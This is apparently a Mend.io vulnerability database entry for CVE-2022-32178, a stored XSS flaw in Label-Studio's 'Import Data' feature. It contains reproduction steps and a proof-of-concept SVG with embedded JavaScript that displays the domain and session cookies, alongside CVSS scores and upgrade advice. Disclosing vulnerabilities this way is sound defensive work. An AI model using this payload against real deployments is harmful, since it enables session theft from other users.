Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2022-32178

Date: October 29, 2022

Overview

In Label-Studio, v1.0.0 to v1.5.0post0 are vulnerable to Stored Cross-Site Scripting (XSS) in the “Import Data''. An authenticated attacker can upload a carefully crafted SVG file that will trigger XSS when any authenticated victim will preview the uploaded file.

Details

The Label-Studio application is vulnerable to Stored XSS vulnerability, where an attacker can upload an SVG file that contains malicious JavaScript in “Data Import” in order to trigger XSS when any authenticated victim will preview the uploaded file.

PoC Details

1. Access http://localhost:8080/user/login/ in the browser and login.
2. Go to the project, and navigate to the “Import Data” section and upload an SVG file containing malicious javascript.
3. Then, access http://localhost:8080/user/login/ in another browser and login with the owner of the project and navigate to the project.
4. Copy the uploaded file URL and access in URL and XSS will be triggered.\t

PoC Code

<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">



<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

   <script type="text/javascript">

      alert(document.domain+'
'+document.cookie);

   </script>

</svg>

Affected Environments

Label-Studio versions v1.0.0 through v1.5.0post0

Prevention

Upgrade to Label-Studio version 1.6.0

Language: Python

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version label-studio - 1.6.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

Related Resources (3)

https://github.com/heartexlabs/label-studio/pull/2273
https://nvd.nist.gov/vuln/detail/CVE-2022-32178
https://www.mend.io/vulnerability-database/CVE-2022-32178